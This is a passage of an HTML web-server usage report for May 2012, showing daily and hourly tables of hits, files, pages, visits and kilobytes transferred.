SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>108</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.12%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>93</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.95%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4469</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.66%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>119</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.33%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>107</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.40%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2858</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.34%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>88</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>80</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.54%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1899</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.55%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>94</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.84%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>83</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2275</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.83%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.40%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>432</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>58</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">9.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>955</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.78%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>226</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>189</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>44</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">8.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9760</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.99%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>158</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>125</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.97%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.48%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.74%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.73%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6221</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.09%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>235</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>200</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.74%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.73%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8513</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.97%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>78</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.53%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>54</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.36%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">9.62%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2784</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.28%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>91</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>73</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.33%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2018</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.65%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.83%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2030</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.66%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>156</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>134</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">8.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7876</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.45%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1368</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">26.80%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>76</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1312</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">55.66%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5222</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.28%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>156</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>142</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">9.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4373</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.58%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>61</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.20%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>52</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1055</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.86%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.68%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>70</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">9.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6117</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.01%</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="HOURSTATS"></A> <IMG SRC="hourly_usage_201205.png" ALT="Hourly usage for May 2012" HEIGHT=256 WIDTH=512><P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" COLSPAN=13 ALIGN=center>Hourly Statistics for May 2012</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH ALIGN=center ROWSPAN=2 BGCOLOR="#C0C0C0"><FONT SIZE="-1">Hour</FONT></TH> <TH ALIGN=center BGCOLOR="#008040" COLSPAN=3><FONT SIZE="-1">Hits</FONT></TH> <TH ALIGN=center BGCOLOR="#0080FF" COLSPAN=3><FONT SIZE="-1">Files</FONT></TH> <TH ALIGN=center BGCOLOR="#00E0FF" COLSPAN=3><FONT SIZE="-1">Pages</FONT></TH> <TH ALIGN=center BGCOLOR="#FF0000" COLSPAN=3><FONT SIZE="-1">KBytes</FONT></TH></TR> <TR><TH ALIGN=center BGCOLOR="#008040"><FONT SIZE="-2">Avg</FONT></TH> <TH ALIGN=center BGCOLOR="#008040" COLSPAN=2><FONT SIZE="-2">Total</FONT></TH> <TH ALIGN=center BGCOLOR="#0080FF"><FONT SIZE="-2">Avg</FONT></TH> <TH ALIGN=center BGCOLOR="#0080FF" COLSPAN=2><FONT SIZE="-2">Total</FONT></TH> <TH ALIGN=center BGCOLOR="#00E0FF"><FONT SIZE="-2">Avg</FONT></TH> <TH ALIGN=center BGCOLOR="#00E0FF" COLSPAN=2><FONT SIZE="-2">Total</FONT></TH> <TH ALIGN=center BGCOLOR="#FF0000"><FONT SIZE="-2">Avg</FONT></TH> <TH ALIGN=center BGCOLOR="#FF0000" COLSPAN=2><FONT SIZE="-2">Total</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>472</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.39%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>80</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>61</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.94%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1125</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.92%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>169</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.31%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>145</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.48%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>150</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4650</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.81%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>81</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>73</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1507</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.23%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>197</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>97</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>125</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>92</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2847</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.33%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>193</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.16%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.39%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1181</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.97%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>140</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4342</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.55%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>872</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">17.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>680</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">21.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>540</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">22.91%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>467</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14482</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.86%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>799</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.65%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>58</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1809</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.48%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.73%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>581</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.48%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>52</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1607</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>170</B></FONT></TD> <TD 